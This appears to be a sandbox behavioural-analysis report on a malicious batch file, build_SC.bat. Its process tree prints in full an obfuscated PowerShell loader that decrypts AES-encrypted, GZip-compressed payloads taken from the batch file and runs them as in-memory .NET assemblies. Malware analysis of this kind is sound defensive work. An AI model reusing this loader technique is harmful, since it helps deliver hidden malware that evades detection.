ZeroBOX

Behavioral Analysis

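Process tree

Reading note: the chain below is cmd.exe → cmd.exe /K build_SC.bat (twice) → build_SC.bat.exe, which is started with `-w hidden -c` and an inline script. The script rebuilds .NET member names by stripping the filler string 'txlj'. It then reads the second line of the file named by its own executable path minus the final extension (build_SC.bat), drops the first two characters and splits the rest on ':'. Each part is Base64-decoded, AES-CBC-decrypted with the key and IV embedded in the command line, and GZip-decompressed. Both results are loaded as in-memory .NET assemblies and their entry points are invoked. build_SC.bat.exe is presumably a renamed PowerShell host, judging by its arguments; the listing does not show where it came from.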

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "EWhuIXEf" C:\Users\test22\AppData\Local\Temp\build_SC.bat

    3016
    • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\build_SC.bat

      964
      • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\build_SC.bat

        2252
        • build_SC.bat.exe "C:\Users\test22\AppData\Local\Temp\build_SC.bat.exe" -w hidden -c $VWrg='Sptxljlitxljttxlj'.Replace('txlj', '');$poxH='Loadtxlj'.Replace('txlj', '');$PSUs='EntrtxljyPtxljointxljttxlj'.Replace('txlj', '');$JWKh='GettxljCutxljrretxljntPtxljrtxljocetxljsstxlj'.Replace('txlj', '');$uMOp='ChtxljangetxljExttxljenstxljiotxljntxlj'.Replace('txlj', '');$ngbA='EletxljmtxljenttxljAtxljttxlj'.Replace('txlj', '');$Idpk='MaitxljnMtxljotxljdutxljletxlj'.Replace('txlj', '');$HZsE='TrtxljantxljsftxljormtxljFitxljnaltxljBlotxljcktxlj'.Replace('txlj', '');$qaJF='FromtxljBtxljatxljsetxlj64txljStxljtrintxljgtxlj'.Replace('txlj', '');$WYHj='CtxljreatxljteDtxljecrtxljyptotxljrtxlj'.Replace('txlj', '');$Yxzl='RetxljadtxljLinetxljstxlj'.Replace('txlj', '');$XZtr='Intxljvotxljktxljetxlj'.Replace('txlj', '');function JeoHt($ELZLV){$PsSBT=[System.Security.Cryptography.Aes]::Create();$PsSBT.Mode=[System.Security.Cryptography.CipherMode]::CBC;$PsSBT.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$PsSBT.Key=[System.Convert]::$qaJF('ysmJpAaiNCwHWX8owtLbwDXbvqF4qqJv/N6iULJxQX4=');$PsSBT.IV=[System.Convert]::$qaJF('KkVvrh415rYbWSxbwOYxSw==');$vXLcw=$PsSBT.$WYHj();$XqKlx=$vXLcw.$HZsE($ELZLV,0,$ELZLV.Length);$vXLcw.Dispose();$PsSBT.Dispose();$XqKlx;}function vIJeV($ELZLV){$fXyGt=New-Object System.IO.MemoryStream(,$ELZLV);$vwbHF=New-Object System.IO.MemoryStream;$QVgMh=New-Object System.IO.Compression.GZipStream($fXyGt,[IO.Compression.CompressionMode]::Decompress);$QVgMh.CopyTo($vwbHF);$QVgMh.Dispose();$fXyGt.Dispose();$vwbHF.Dispose();$vwbHF.ToArray();}$BZAmP=[System.Linq.Enumerable]::$ngbA([System.IO.File]::$Yxzl([System.IO.Path]::$uMOp([System.Diagnostics.Process]::$JWKh().$Idpk.FileName, $null)), 1);$hOQTZ=$BZAmP.Substring(2).$VWrg(':');$OGRUZ=vIJeV (JeoHt ([Convert]::$qaJF($hOQTZ[0])));$aLVEO=vIJeV (JeoHt 
([Convert]::$qaJF($hOQTZ[1])));[System.Reflection.Assembly]::$poxH([byte[]]$aLVEO).$PSUs.$XZtr($null,$null);[System.Reflection.Assembly]::$poxH([byte[]]$OGRUZ).$PSUs.$XZtr($null,$null);

          2412
